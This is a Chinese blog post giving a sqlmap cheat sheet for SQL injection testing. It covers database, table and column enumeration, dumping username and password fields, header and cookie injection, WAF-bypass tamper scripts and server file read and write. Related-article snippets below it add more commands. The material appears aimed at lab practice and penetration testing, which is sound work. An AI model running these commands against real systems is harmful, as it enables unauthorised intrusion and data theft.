sqlmap使用教程

已于 2022-11-26 00:59:33 修改
阅读量1.6k 收藏 3
点赞数 1
文章标签: sql web安全
于 2022-11-26 00:35:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57048716/article/details/128046790
版权

url探测

get方式:sqlmap -u "url"
post方式:sqlmap -u "url" --data "post数据"

文件读取目标

-r 从文本文件中读取http请求作为sql注入探测的目标
-m 从多行文本格式文件读取多个目标,对多个目标进行探测

常用步骤:

1.探测数据库名

--dbs --batch

2.探测表名

-D 库名 --tables --batch

3.探测字段名

-D 库名 -T 表名 --columns --batch

4.探测字段值

-D 库名 -T 表名 -C username(字段),password --dump --batch

对User-Agent进行注入(Referer也可以)

方法一:

--data="uname=admin&passwd=admin&submit=Submit" --user-agent="*"

方法二:

在保存有http请求的文本文件中,参数后面加上*(要去掉/),再用-r读取			
例:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0*
Referer: http://127.0.0.1/sqli/Less-20*

方法三:(最慢的,当level等级达到3时,会对UA、Referer进行注入)

--level 3

对Cooker进行注入

方法一:

-u "url" --cookie="uname=*" --level 2 --dbs --batch
//post请求中:有uname参数

方法二:

--level 2 
//不一定能跑出来,当level等级达到2时,会尝试对cooker进行注入

–technique=参数(–tech=参数)

//使用的 SQL 注入技术(默认为“BEUSTQ”)
B: Boolean-based blind SQL injection(布尔型盲注)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(联合查询注入)
S: Stacked queries SQL injection(堆叠查询注入)
T: Time-based blind SQL injection(时间型盲注)
Q: inline Query injection(内联查询注入)

代理:

--proxy="http://ip:端口"

脚本:

--tamper "模块名"		使用模块脚本

模块名:

unmagicquotes.py		宽字节
space2randomblank.py	将空格替换为其他有效字符
space2mssqlblank.py		将空格替换为其他有效字符(mssql)
spaceZmysqlblank.py		将空格替换为其他有效字符(mysql)
base64encode.py			用base64格式进行编码
charencode.py			采用url格式编码1次
chardoubleencode.py		采用url格式编码2次
modsecurityversioned.py			用注释来包围完整的查询语句,用于绕过 ModSecurity 开源 waf
modsecurityzeroversioned.py		用注释来包围完整的查询语句,用于绕过 waf ,和上面类似
nonrecursivereplacement.py		关键字双写,可用于关键字过滤

通用

-p="id"				指定参数
--skip="id"			跳过参数
-random-agent		随机user-agent
--dbms="mysql"		指定扫描的数据库
--current-db		获取当前数据库名称
--current-user      获取 DBMS 当前用户
--is-dba			探测 DBMS 当前用户是否为 DBA(数据库管理员)
--threads=1-10		线程数
--purge				清理缓存记录
--batch				全自动
--level 1-5			测试等级
--risk 1-3			风险等级
--dump				导出数据,在字段名前面时是打印数据
--delay				使设定两次http请求的延时(秒),预防太过频繁被防火墙拦截
--referer"'			伪造referer
--prefix=""   		注入 payload 的前缀字符串
--suffix=""	 	    注入 payload 的后缀字符串

--users				当前用户名
--passwords			当前用户密码

暴力破解:

以下选项用于暴力破解测试

--common-tables     检测常见的表名是否存在
--common-columns    检测常用的列名是否存在
--common-files      检测普通文件是否存在

性能优化参数:

-- keep-alive 设置持久连接,加快探测速度
-- nu-connection 检索没有body响应的内容,多用于盲注,但不与–threads兼容
-- thread 最大为10设置多线程
- o 开启所有默认性能优化
- smart 快速判断,节约时间

设置无效值替换(默认使用负数)

–invalid-bignum 	用大数字替换原始值(id=1999999999)
–invalid-logical 	用布尔运算替换原始值(id=1 and 1=2)
–invalid-string 	用随机字符串替换原始值(id=asdsa)

文件读写

//file参数使用 权限:必须为dba权限 
--file-read="目标文件路径"			//文件读取
--file-write="本地上传文件路径" --file-dest="写入目标路径" 		//从本地文件上传

sqlmap用户手册:

https://sqlmap.kvko.live/usage
bcxc.
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
Sqlmap 性能优化
白菜执笔人的博客
02-26 4748
Web安全攻防 学习笔记 一、Sqlmap 性能优化 1.1、Sqlmap 设置持久 HTTP 连接 sqlmap 中可以设置连接为持久连接,也就是长连接,连接一次就不需要多次发送连接请求。HTTP 报文中设置connection:keep-alive 。 注意: --keep-alive 不能与 --proxy 一起使用,会发送冲突。 $ python sqlmap.py -u "h...
Kali下Sqlmap工具使用方法之POST方法篇
Liu_Bruce的博客
09-18 5321
大家好,上周讲解了SQL注入漏洞实验的GET方法测试过程。今天向大家继续讲解SQL注入漏洞的POST方法测试过程。工具是大家熟悉的SqlmapSqlmap是一款开源的SQL注入漏洞检测与利用神器,没有之一。测试平台是漏洞扫描工具AWVS的测试平台:http://testphp.vulnweb.com,kali系统,今天还用到抓包工具OWASP ZAP2.5.0。因为POST方法需要用抓包工具抓到post请求包,然后存成txt文件。 下面介绍一下操作步骤: ——————————————...
史上最详细sqlmap入门教程_sqlmap使用教程,2024年最新学海无涯
最新发布
2401_84254177的博客
04-11 1029
例如:python sqlmap.py -r D:\user.txt --columns -D testdb -T users -C name10、-C用来指定要枚举的数据库表的列名称例如:python sqlmap.py -r D:\user.txt --columns -D testdb -T users -C name使用这个参数sqlmap将不会从缓存里面加载数据,从而能将最新的数据注入到数据库。
sqlmap学习笔记——sql注入post注入
zhh763984017的博客
11-16 1万+
sqlmap学习笔记——sql注入post注入 工作环境:kali-Linux、win10 靶机:墨子学院提供的用于post漏洞SQL注入的靶机 使用到的软件:wireshark、sqlmap 先随便提交一个表单,然后在windows下用wireshark捕捉了post请求的内容,post请求内容如下: POST /login.php HTTP/1.1 Host: 219.153.49.228:4...
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4024
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2855
使用sqlmap进行post注入学习笔记
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3636
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
Sqlmap -- POST注入
weixin_41489908的博客
07-07 2641
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap的使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
sqlmap安装包及教程.zip
12-23
sqlmap是强大的辅助测试sql注入工具,压缩包里提供了安装包和后续配置教程
Windows下Sqlmap环境安装教程详解
01-21
Sqlmap安装 Sqlmap >> 基于Python的自动化渗透测试工具,安装工具前需要进行Python的环境准备 Python环境的安装 1.1 下载与安装 python(2.7.16): ...
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap基于...
Sqlmap 22.05.22.03(Sqlmap请求参数设置)
辉小鱼的博客
11-05 1177
sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 924
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
sqlmap工具
zxgt5y的博客
02-24 705
sqlmap工具基础
sqlmap 使用教程
09-23
sqlmap是一款用于自动化SQL注入的工具,它可以帮助安全测试人员识别和利用Web应用程序中的SQL注入漏洞。下面是sqlmap使用教程: 1. 扫描URL:使用以下命令扫描目标URL并确定是否存在SQL注入漏洞: sqlmap -u "http://example.com/page.php?id=1" 2. 指定数据库和表名:如果成功发现SQL注入漏洞,可以使用以下命令指定数据库和表名: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name 3. 获取字段信息:要获取表的字段信息,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns 4. 获取数据:要获取表中的数据,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C column1,column2,... --dump 5. 获取当前数据库:如果只想获取当前所使用的数据库,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" --current-db 请注意,以上命令只是sqlmap的一些基本用法。sqlmap还有许多其他功能和选项,你可以通过sqlmap的官方文档来深入了解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值